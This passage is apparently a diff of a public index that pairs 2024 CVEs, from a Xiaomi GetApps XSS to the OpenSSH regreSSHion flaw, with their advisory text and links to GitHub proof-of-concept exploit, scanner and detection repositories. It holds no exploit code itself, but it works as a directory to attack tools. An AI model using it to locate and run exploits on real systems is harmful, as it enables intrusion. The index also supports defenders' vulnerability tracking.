[exfil0/WEAPONIZING-CVE-2024-4367](https://github.com/exfil0/WEAPONIZING-CVE-2024-4367) + +### CVE-2024-4406 (2024-05-02) + +Xiaomi Pro 13 GetApps integral-dialog-page Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xiaomi Pro 13 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the integral-dialog-page.html file. When parsing the integralInfo parameter, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22332. + + +- [Yogehi/cve-2024-4406-xiaomi13pro-exploit-files](https://github.com/Yogehi/cve-2024-4406-xiaomi13pro-exploit-files) + +### CVE-2024-4439 (2024-05-03) + +WordPress Core is vulnerable to Stored Cross-Site Scripting via user display names in the Avatar block in various versions up to 6.5.2 due to insufficient output escaping on the display name. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. In addition, it also makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that have the comment block present and display the comment author's avatar. + + +- [MielPopsssssss/CVE-2024-4439](https://github.com/MielPopsssssss/CVE-2024-4439) +- [d0rb/CVE-2024-4439](https://github.com/d0rb/CVE-2024-4439) +- [xssor-dz/-CVE-2024-4439](https://github.com/xssor-dz/-CVE-2024-4439) +- [soltanali0/CVE-2024-4439](https://github.com/soltanali0/CVE-2024-4439) +- [w0r1i0g1ht/CVE-2024-4439](https://github.com/w0r1i0g1ht/CVE-2024-4439) + +### CVE-2024-4443 (2024-05-22) + +The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-4443-Poc](https://github.com/truonghuuphuc/CVE-2024-4443-Poc) + +### CVE-2024-4573 +- [Castro-Ian/CVE-2024-4573-Mitigation-Script](https://github.com/Castro-Ian/CVE-2024-4573-Mitigation-Script) + +### CVE-2024-4577 (2024-06-09) + +In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc. + + +- [TAM-K592/CVE-2024-4577](https://github.com/TAM-K592/CVE-2024-4577) +- [ohhhh693/CVE-2024-4577](https://github.com/ohhhh693/CVE-2024-4577) +- [Junp0/CVE-2024-4577](https://github.com/Junp0/CVE-2024-4577) +- [princew88/CVE-2024-4577](https://github.com/princew88/CVE-2024-4577) +- [11whoami99/CVE-2024-4577](https://github.com/11whoami99/CVE-2024-4577) +- [watchtowrlabs/CVE-2024-4577](https://github.com/watchtowrlabs/CVE-2024-4577) +- [zjhzjhhh/CVE-2024-4577](https://github.com/zjhzjhhh/CVE-2024-4577) +- [huseyinstif/CVE-2024-4577-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template) +- [taida957789/CVE-2024-4577](https://github.com/taida957789/CVE-2024-4577) +- [Wh02m1/CVE-2024-4577](https://github.com/Wh02m1/CVE-2024-4577) +- [Sysc4ll3r/CVE-2024-4577](https://github.com/Sysc4ll3r/CVE-2024-4577) +- [WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP](https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP) +- [BitMEXResearch/CVE-2024-4577](https://github.com/BitMEXResearch/CVE-2024-4577) +- [0x20c/CVE-2024-4577-nuclei](https://github.com/0x20c/CVE-2024-4577-nuclei) +- [manuelinfosec/CVE-2024-4577](https://github.com/manuelinfosec/CVE-2024-4577) +- [zomasec/CVE-2024-4577](https://github.com/zomasec/CVE-2024-4577) +- [ZephrFish/CVE-2024-4577-PHP-RCE](https://github.com/ZephrFish/CVE-2024-4577-PHP-RCE) +- [xcanwin/CVE-2024-4577-PHP-RCE](https://github.com/xcanwin/CVE-2024-4577-PHP-RCE) +- [dbyMelina/CVE-2024-4577](https://github.com/dbyMelina/CVE-2024-4577) +- [Chocapikk/CVE-2024-4577](https://github.com/Chocapikk/CVE-2024-4577) +- [K3ysTr0K3R/CVE-2024-4577-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-4577-EXPLOIT) +- [bl4cksku11/CVE-2024-4577](https://github.com/bl4cksku11/CVE-2024-4577) +- [nemu1k5ma/CVE-2024-4577](https://github.com/nemu1k5ma/CVE-2024-4577) +- [aaddmin1122345/cve-2024-4577](https://github.com/aaddmin1122345/cve-2024-4577) +- [d3ck4/Shodan-CVE-2024-4577](https://github.com/d3ck4/Shodan-CVE-2024-4577) +- [Entropt/CVE-2024-4577_Analysis](https://github.com/Entropt/CVE-2024-4577_Analysis) +- [XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE](https://github.com/XiangDongCJC/CVE-2024-4577-PHP-CGI-RCE) +- [hexedbyte/cve-2024-4577](https://github.com/hexedbyte/cve-2024-4577) +- [Sh0ckFR/CVE-2024-4577](https://github.com/Sh0ckFR/CVE-2024-4577) +- [gotr00t0day/CVE-2024-4577](https://github.com/gotr00t0day/CVE-2024-4577) +- [sug4r-wr41th/CVE-2024-4577](https://github.com/sug4r-wr41th/CVE-2024-4577) +- [VictorShem/CVE-2024-4577](https://github.com/VictorShem/CVE-2024-4577) +- [jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE](https://github.com/jakabakos/CVE-2024-4577-PHP-CGI-argument-injection-RCE) +- [PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough](https://github.com/PhinehasNarh/CVE-2024-4577-LetsDefend-walkthrough) +- [ggfzx/CVE-2024-4577](https://github.com/ggfzx/CVE-2024-4577) +- [olebris/CVE-2024-4577](https://github.com/olebris/CVE-2024-4577) +- [AlperenY-cs/CVE-2024-4577](https://github.com/AlperenY-cs/CVE-2024-4577) +- [charis3306/CVE-2024-4577](https://github.com/charis3306/CVE-2024-4577) +- [l0n3m4n/CVE-2024-4577-RCE](https://github.com/l0n3m4n/CVE-2024-4577-RCE) +- [bibo318/CVE-2024-4577-RCE-ATTACK](https://github.com/bibo318/CVE-2024-4577-RCE-ATTACK) +- [waived/CVE-2024-4577-PHP-RCE](https://github.com/waived/CVE-2024-4577-PHP-RCE) +- [nNoSuger/CVE-2024-4577](https://github.com/nNoSuger/CVE-2024-4577) +- [a-roshbaik/CVE-2024-4577](https://github.com/a-roshbaik/CVE-2024-4577) +- [a-roshbaik/CVE-2024-4577-PHP-RCE](https://github.com/a-roshbaik/CVE-2024-4577-PHP-RCE) +- [Jcccccx/CVE-2024-4577](https://github.com/Jcccccx/CVE-2024-4577) +- [bughuntar/CVE-2024-4577](https://github.com/bughuntar/CVE-2024-4577) +- [gh-ost00/CVE-2024-4577-RCE](https://github.com/gh-ost00/CVE-2024-4577-RCE) +- [ywChen-NTUST/PHP-CGI-RCE-Scanner](https://github.com/ywChen-NTUST/PHP-CGI-RCE-Scanner) +- [AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-](https://github.com/AhmedMansour93/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-) +- [phirojshah/CVE-2024-4577](https://github.com/phirojshah/CVE-2024-4577) +- [JeninSutradhar/CVE-2024-4577-checker](https://github.com/JeninSutradhar/CVE-2024-4577-checker) +- [longhoangth18/CVE-2024-4577](https://github.com/longhoangth18/CVE-2024-4577) +- [ahmetramazank/CVE-2024-4577](https://github.com/ahmetramazank/CVE-2024-4577) +- [BTtea/CVE-2024-4577-RCE-PoC](https://github.com/BTtea/CVE-2024-4577-RCE-PoC) + +### CVE-2024-4701 (2024-05-10) + +A path traversal issue potentially leading to remote code execution in Genie for all versions prior to 4.3.18 + + +- [JoeBeeton/CVE-2024-4701-POC](https://github.com/JoeBeeton/CVE-2024-4701-POC) + +### CVE-2024-4761 (2024-05-14) + +Out of bounds write in V8 in Google Chrome prior to 124.0.6367.207 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High) + + +- [michredteam/CVE-2024-4761](https://github.com/michredteam/CVE-2024-4761) + +### CVE-2024-4875 (2024-05-21) + +The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration. + + +- [RandomRobbieBF/CVE-2024-4875](https://github.com/RandomRobbieBF/CVE-2024-4875) + +### CVE-2024-4879 (2024-07-10) + +ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible. + + +- [Brut-Security/CVE-2024-4879](https://github.com/Brut-Security/CVE-2024-4879) +- [bigb0x/CVE-2024-4879](https://github.com/bigb0x/CVE-2024-4879) +- [Mr-r00t11/CVE-2024-4879](https://github.com/Mr-r00t11/CVE-2024-4879) +- [ShadowByte1/CVE-2024-4879](https://github.com/ShadowByte1/CVE-2024-4879) +- [Praison001/CVE-2024-4879-ServiceNow](https://github.com/Praison001/CVE-2024-4879-ServiceNow) +- [NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning](https://github.com/NoTsPepino/CVE-2024-4879-CVE-2024-5217-ServiceNow-RCE-Scanning) +- [jdusane/CVE-2024-4879](https://github.com/jdusane/CVE-2024-4879) +- [gh-ost00/CVE-2024-4879](https://github.com/gh-ost00/CVE-2024-4879) +- [0xWhoami35/CVE-2024-4879](https://github.com/0xWhoami35/CVE-2024-4879) + +### CVE-2024-4883 (2024-06-25) + +In WhatsUp Gold versions released before 2023.1.3, a Remote Code Execution issue exists in Progress WhatsUp Gold. This vulnerability allows an unauthenticated attacker to achieve the RCE as a service account through NmApi.exe. + + +- [sinsinology/CVE-2024-4883](https://github.com/sinsinology/CVE-2024-4883) + +### CVE-2024-4885 (2024-06-25) + +In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold.  The \n\nWhatsUp.ExportUtilities.Export.GetFileWithoutZip\n\n\n\n allows execution of commands with iisapppool\nmconsole privileges. + + +- [sinsinology/CVE-2024-4885](https://github.com/sinsinology/CVE-2024-4885) + +### CVE-2024-4898 (2024-06-12) + +The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts. + + +- [truonghuuphuc/CVE-2024-4898-Poc](https://github.com/truonghuuphuc/CVE-2024-4898-Poc) +- [cve-2024/CVE-2024-4898-Poc](https://github.com/cve-2024/CVE-2024-4898-Poc) + +### CVE-2024-4956 (2024-05-16) + +Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. + + +- [banditzCyber0x/CVE-2024-4956](https://github.com/banditzCyber0x/CVE-2024-4956) +- [xungzzz/CVE-2024-4956](https://github.com/xungzzz/CVE-2024-4956) +- [erickfernandox/CVE-2024-4956](https://github.com/erickfernandox/CVE-2024-4956) +- [gmh5225/CVE-2024-4956](https://github.com/gmh5225/CVE-2024-4956) +- [ifconfig-me/CVE-2024-4956-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-4956-Bulk-Scanner) +- [thinhap/CVE-2024-4956-PoC](https://github.com/thinhap/CVE-2024-4956-PoC) +- [yagyuufellinluvv/CVE-2024-4956](https://github.com/yagyuufellinluvv/CVE-2024-4956) +- [GoatSecurity/CVE-2024-4956](https://github.com/GoatSecurity/CVE-2024-4956) +- [TypicalModMaker/CVE-2024-4956](https://github.com/TypicalModMaker/CVE-2024-4956) +- [Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager](https://github.com/Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager) +- [Cappricio-Securities/CVE-2024-4956](https://github.com/Cappricio-Securities/CVE-2024-4956) +- [fin3ss3g0d/CVE-2024-4956](https://github.com/fin3ss3g0d/CVE-2024-4956) +- [verylazytech/CVE-2024-4956](https://github.com/verylazytech/CVE-2024-4956) +- [JolyIrsb/CVE-2024-4956](https://github.com/JolyIrsb/CVE-2024-4956) +- [UMASANKAR-MG/Path-Traversal-CVE-2024-4956](https://github.com/UMASANKAR-MG/Path-Traversal-CVE-2024-4956) +- [An00bRektn/shirocrack](https://github.com/An00bRektn/shirocrack) +- [XiaomingX/cve-2024-4956](https://github.com/XiaomingX/cve-2024-4956) + +### CVE-2024-5009 (2024-06-25) + +In WhatsUp Gold versions released before 2023.1.3, an Improper Access Control vulnerability in Wug.UI.Controllers.InstallController.SetAdminPassword allows local attackers to modify admin's password. + + +- [sinsinology/CVE-2024-5009](https://github.com/sinsinology/CVE-2024-5009) +- [th3gokul/CVE-2024-5009](https://github.com/th3gokul/CVE-2024-5009) + +### CVE-2024-5084 (2024-05-23) + +The Hash Form – Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + + +- [KTN1990/CVE-2024-5084](https://github.com/KTN1990/CVE-2024-5084) +- [Chocapikk/CVE-2024-5084](https://github.com/Chocapikk/CVE-2024-5084) +- [k3lpi3b4nsh33/CVE-2024-5084](https://github.com/k3lpi3b4nsh33/CVE-2024-5084) +- [WOOOOONG/CVE-2024-5084](https://github.com/WOOOOONG/CVE-2024-5084) +- [z1gazaga/CVE-2024-5084](https://github.com/z1gazaga/CVE-2024-5084) +- [Raeezrbr/CVE-2024-5084](https://github.com/Raeezrbr/CVE-2024-5084) + +### CVE-2024-5124 (2024-06-06) + +A timing attack vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, specifically within the password comparison logic. The vulnerability is present in version 20240310 of the software, where passwords are compared using the '=' operator in Python. This method of comparison allows an attacker to guess passwords based on the timing of each character's comparison. The issue arises from the code segment that checks a password for a particular username, which can lead to the exposure of sensitive information to an unauthorized actor. An attacker exploiting this vulnerability could potentially guess user passwords, compromising the security of the system. + + +- [gogo2464/CVE-2024-5124](https://github.com/gogo2464/CVE-2024-5124) +- [XiaomingX/cve-2024-5124-poc](https://github.com/XiaomingX/cve-2024-5124-poc) + +### CVE-2024-5246 (2024-05-23) + +NETGEAR ProSAFE Network Management System Tomcat Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the product installer. The issue results from the use of a vulnerable version of Apache Tomcat. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-22868. + + +- [Abdurahmon3236/CVE-2024-5246](https://github.com/Abdurahmon3236/CVE-2024-5246) + +### CVE-2024-5274 (2024-05-28) + +Type Confusion in V8 in Google Chrome prior to 125.0.6422.112 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) + + +- [Alchemist3dot14/CVE-2024-5274-Detection](https://github.com/Alchemist3dot14/CVE-2024-5274-Detection) +- [mistymntncop/CVE-2024-5274](https://github.com/mistymntncop/CVE-2024-5274) + +### CVE-2024-5324 (2024-06-06) + +The Login/Signup Popup ( Inline Form + Woocommerce ) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'import_settings' function in versions 2.7.1 to 2.7.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator. + + +- [RandomRobbieBF/CVE-2024-5324](https://github.com/RandomRobbieBF/CVE-2024-5324) + +### CVE-2024-5326 (2024-05-30) + +The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'postx_presets_callback' function in all versions up to, and including, 4.1.2. This makes it possible for authenticated attackers, with Contributor-level access and above, to change arbitrary options on affected sites. This can be used to enable new user registration and set the default role for new users to Administrator. + + +- [truonghuuphuc/CVE-2024-5326-Poc](https://github.com/truonghuuphuc/CVE-2024-5326-Poc) +- [cve-2024/CVE-2024-5326-Poc](https://github.com/cve-2024/CVE-2024-5326-Poc) + +### CVE-2024-5356 (2024-05-26) + +Es wurde eine Schwachstelle in anji-plus AJ-Report bis 1.4.1 gefunden. Sie wurde als kritisch eingestuft. Dabei betrifft es einen unbekannter Codeteil der Datei /dataSet/testTransform;swagger-ui. Mit der Manipulation des Arguments dynSentence mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [droyuu/Aj-Report-sql-CVE-2024-5356-POC](https://github.com/droyuu/Aj-Report-sql-CVE-2024-5356-POC) + +### CVE-2024-5420 (2024-06-04) + +Missing input validation in the SEH Computertechnik utnserver Pro, SEH Computertechnik utnserver ProMAX, SEH Computertechnik INU-100 web-interface allows stored Cross-Site Scripting (XSS)..This issue affects utnserver Pro, utnserver ProMAX, INU-100 version 20.1.22 and below. + + +- [gh-ost00/CVE-2024-5420-XSS](https://github.com/gh-ost00/CVE-2024-5420-XSS) +- [K4yd0/CVE-2024-5420_XSS](https://github.com/K4yd0/CVE-2024-5420_XSS) + +### CVE-2024-5452 (2024-06-06) + +A remote code execution (RCE) vulnerability exists in the lightning-ai/pytorch-lightning library version 2.2.1 due to improper handling of deserialized user input and mismanagement of dunder attributes by the `deepdiff` library. The library uses `deepdiff.Delta` objects to modify application state based on frontend actions. However, it is possible to bypass the intended restrictions on modifying dunder attributes, allowing an attacker to construct a serialized delta that passes the deserializer whitelist and contains dunder attributes. When processed, this can be exploited to access other modules, classes, and instances, leading to arbitrary attribute write and total RCE on any self-hosted pytorch-lightning application in its default configuration, as the delta endpoint is enabled by default. + + +- [XiaomingX/cve-2024-5452-poc](https://github.com/XiaomingX/cve-2024-5452-poc) + +### CVE-2024-5522 (2024-06-20) + +The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks + + +- [truonghuuphuc/CVE-2024-5522-Poc](https://github.com/truonghuuphuc/CVE-2024-5522-Poc) +- [kryptonproject/CVE-2024-5522-PoC](https://github.com/kryptonproject/CVE-2024-5522-PoC) +- [geniuszly/CVE-2024-5522](https://github.com/geniuszly/CVE-2024-5522) + +### CVE-2024-5633 (2024-07-09) + +Longse model LBH30FE200W cameras, as well as products based on this device, provide an unrestricted access for an attacker located in the same local network to an undocumented binary service CoolView on one of the ports. \nAn attacker with a knowledge of the available commands is able to perform read/write operations on the device's memory, which might result in e.g. bypassing telnet login and obtaining full access to the device. + + +- [Adikso/CVE-2024-5633](https://github.com/Adikso/CVE-2024-5633) + +### CVE-2024-5735 (2024-06-28) + +Full Path Disclosure vulnerability in AdmirorFrames Joomla! extension in afHelper.php script allows an unauthorised attacker to retrieve location of web root folder. This issue affects AdmirorFrames: before 5.0. + + +- [afine-com/CVE-2024-5735](https://github.com/afine-com/CVE-2024-5735) + +### CVE-2024-5736 (2024-06-28) + +Server Side Request Forgery (SSRF) vulnerability in AdmirorFrames Joomla! extension in afGdStream.php script allows to access local files or server pages available only from localhost. This issue affects AdmirorFrames: before 5.0. + + +- [afine-com/CVE-2024-5736](https://github.com/afine-com/CVE-2024-5736) + +### CVE-2024-5737 (2024-06-28) + +Script afGdStream.php in AdmirorFrames Joomla! extension doesn’t specify a content type and as a result default (text/html) is used. An attacker may embed HTML tags directly in image data which is rendered by a webpage as HTML. This issue affects AdmirorFrames: before 5.0. + + +- [afine-com/CVE-2024-5737](https://github.com/afine-com/CVE-2024-5737) + +### CVE-2024-5764 (2024-10-23) + +Use of Hard-coded Credentials vulnerability in Sonatype Nexus Repository has been discovered in the code responsible for encrypting any secrets stored in the Nexus Repository configuration database (SMTP or HTTP proxy credentials, user tokens, tokens, among others). The affected versions relied on a static hard-coded encryption passphrase. While it was possible for an administrator to define an alternate encryption passphrase, it could only be done at first boot and not updated.\n\nThis issue affects Nexus Repository: from 3.0.0 through 3.72.0. + + +- [fin3ss3g0d/CVE-2024-5764](https://github.com/fin3ss3g0d/CVE-2024-5764) + +### CVE-2024-5806 (2024-06-25) + +Improper Authentication vulnerability in Progress MOVEit Transfer (SFTP module) can lead to Authentication Bypass.This issue affects MOVEit Transfer: from 2023.0.0 before 2023.0.11, from 2023.1.0 before 2023.1.6, from 2024.0.0 before 2024.0.2. + + +- [watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806](https://github.com/watchtowrlabs/watchTowr-vs-progress-moveit_CVE-2024-5806) + +### CVE-2024-5910 (2024-07-10) + +Missing authentication for a critical function in Palo Alto Networks Expedition can lead to an Expedition admin account takeover for attackers with network access to Expedition.\n\nNote: Expedition is a tool aiding in configuration migration, tuning, and enrichment. Configuration secrets, credentials, and other data imported into Expedition is at risk due to this issue. + + +- [p33d/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464](https://github.com/p33d/Palo-Alto-Expedition-Remote-Code-Execution-Exploit-CVE-2024-5910-CVE-2024-9464) + +### CVE-2024-5932 (2024-08-20) + +The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files. + + +- [0xb0mb3r/CVE-2024-5932-PoC](https://github.com/0xb0mb3r/CVE-2024-5932-PoC) +- [EQSTLab/CVE-2024-5932](https://github.com/EQSTLab/CVE-2024-5932) +- [OxLmahdi/cve-2024-5932](https://github.com/OxLmahdi/cve-2024-5932) + +### CVE-2024-5947 (2024-06-13) + +Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679. + + +- [Cappricio-Securities/CVE-2024-5947](https://github.com/Cappricio-Securities/CVE-2024-5947) + +### CVE-2024-5961 (2024-06-14) + +Improper neutralization of input during web page generation vulnerability in 2ClickPortal software allows reflected cross-site scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects 2ClickPortal software versions from 7.2.31 through 7.6.4. + + +- [kac89/CVE-2024-5961](https://github.com/kac89/CVE-2024-5961) + +### CVE-2024-6028 (2024-06-25) + +The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [truonghuuphuc/CVE-2024-6028-Poc](https://github.com/truonghuuphuc/CVE-2024-6028-Poc) + +### CVE-2024-6043 (2024-06-17) + +Es wurde eine Schwachstelle in SourceCodester Best House Rental Management System 1.0 entdeckt. Sie wurde als kritisch eingestuft. Es geht dabei um die Funktion login der Datei admin_class.php. Durch Manipulation des Arguments username mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [lfillaz/CVE-2024-6043](https://github.com/lfillaz/CVE-2024-6043) + +### CVE-2024-6050 (2024-07-01) + +Improper Neutralization of Input During Web Page Generation vulnerability in SOKRATES-software SOWA OPAC allows a Reflected Cross-Site Scripting (XSS). An attacker might trick somebody into using a crafted URL, which will cause a script to be run in user's browser. This issue affects SOWA OPAC software in versions from 4.0 before 4.9.10, from 5.0 before 6.2.12. + + +- [kac89/CVE-2024-6050](https://github.com/kac89/CVE-2024-6050) + +### CVE-2024-6095 (2024-07-06) + +A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. + + +- [Abdurahmon3236/-CVE-2024-6095](https://github.com/Abdurahmon3236/-CVE-2024-6095) + +### CVE-2024-6205 (2024-07-19) + +The PayPlus Payment Gateway WordPress plugin before 6.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement via a WooCommerce API route available to unauthenticated users, leading to an SQL injection vulnerability. + + +- [j3r1ch0123/CVE-2024-6205](https://github.com/j3r1ch0123/CVE-2024-6205) + +### CVE-2024-6222 (2024-07-09) + +In Docker Desktop before v4.29.0, an attacker who has gained access to the Docker Desktop VM through a container breakout can further escape to the host by passing extensions and dashboard related IPC messages.\n\nDocker Desktop v4.29.0 https://docs.docker.com/desktop/release-notes/#4290 fixes the issue on MacOS, Linux and Windows with Hyper-V backend.\n\nAs exploitation requires "Allow only extensions distributed through the Docker Marketplace" to be disabled, Docker Desktop  v4.31.0 https://docs.docker.com/desktop/release-notes/#4310  additionally changes the default configuration to enable this setting by default. + + +- [Florian-Hoth/CVE-2024-6222](https://github.com/Florian-Hoth/CVE-2024-6222) + +### CVE-2024-6330 (2024-08-19) + +The GEO my WP WordPress plugin before 4.5.0.2 does not prevent unauthenticated attackers from including arbitrary files in PHP's execution context, which leads to Remote Code Execution. + + +- [RandomRobbieBF/CVE-2024-6330](https://github.com/RandomRobbieBF/CVE-2024-6330) + +### CVE-2024-6366 (2024-07-29) + +The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP. + + +- [Abdurahmon3236/CVE-2024-6366](https://github.com/Abdurahmon3236/CVE-2024-6366) + +### CVE-2024-6386 (2024-08-21) + +The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server. + + +- [argendo/CVE-2024-6386](https://github.com/argendo/CVE-2024-6386) + +### CVE-2024-6387 (2024-07-01) + +A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). There is a race condition which can lead sshd to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period. + + +- [zgzhang/cve-2024-6387-poc](https://github.com/zgzhang/cve-2024-6387-poc) +- [acrono/cve-2024-6387-poc](https://github.com/acrono/cve-2024-6387-poc) +- [lflare/cve-2024-6387-poc](https://github.com/lflare/cve-2024-6387-poc) +- [shyrwall/cve-2024-6387-poc](https://github.com/shyrwall/cve-2024-6387-poc) +- [getdrive/CVE-2024-6387-PoC](https://github.com/getdrive/CVE-2024-6387-PoC) +- [FerasAlrimali/CVE-2024-6387-POC](https://github.com/FerasAlrimali/CVE-2024-6387-POC) +- [passwa11/cve-2024-6387-poc](https://github.com/passwa11/cve-2024-6387-poc) +- [jack0we/CVE-2024-6387](https://github.com/jack0we/CVE-2024-6387) +- [xaitax/CVE-2024-6387_Check](https://github.com/xaitax/CVE-2024-6387_Check) +- [bigb0x/CVE-2024-6387](https://github.com/bigb0x/CVE-2024-6387) +- [wiggels/regresshion-check](https://github.com/wiggels/regresshion-check) +- [3yujw7njai/CVE-2024-6387](https://github.com/3yujw7njai/CVE-2024-6387) +- [betancour/OpenSSH-Vulnerability-test](https://github.com/betancour/OpenSSH-Vulnerability-test) +- [muyuanlove/CVE-2024-6387fixshell](https://github.com/muyuanlove/CVE-2024-6387fixshell) +- [TAM-K592/CVE-2024-6387](https://github.com/TAM-K592/CVE-2024-6387) +- [teamos-hub/regreSSHion](https://github.com/teamos-hub/regreSSHion) +- [ahlfors/CVE-2024-6387](https://github.com/ahlfors/CVE-2024-6387) +- [Mufti22/CVE-2024-6387-checkher](https://github.com/Mufti22/CVE-2024-6387-checkher) +- [thegenetic/CVE-2024-6387-exploit](https://github.com/thegenetic/CVE-2024-6387-exploit) +- [R4Tw1z/CVE-2024-6387](https://github.com/R4Tw1z/CVE-2024-6387) +- [d0rb/CVE-2024-6387](https://github.com/d0rb/CVE-2024-6387) +- [CiderAndWhisky/regression-scanner](https://github.com/CiderAndWhisky/regression-scanner) +- [shamo0/CVE-2024-6387_PoC](https://github.com/shamo0/CVE-2024-6387_PoC) +- [paradessia/CVE-2024-6387-nmap](https://github.com/paradessia/CVE-2024-6387-nmap) +- [SecWithMoh/CVE-2024-6387](https://github.com/SecWithMoh/CVE-2024-6387) +- 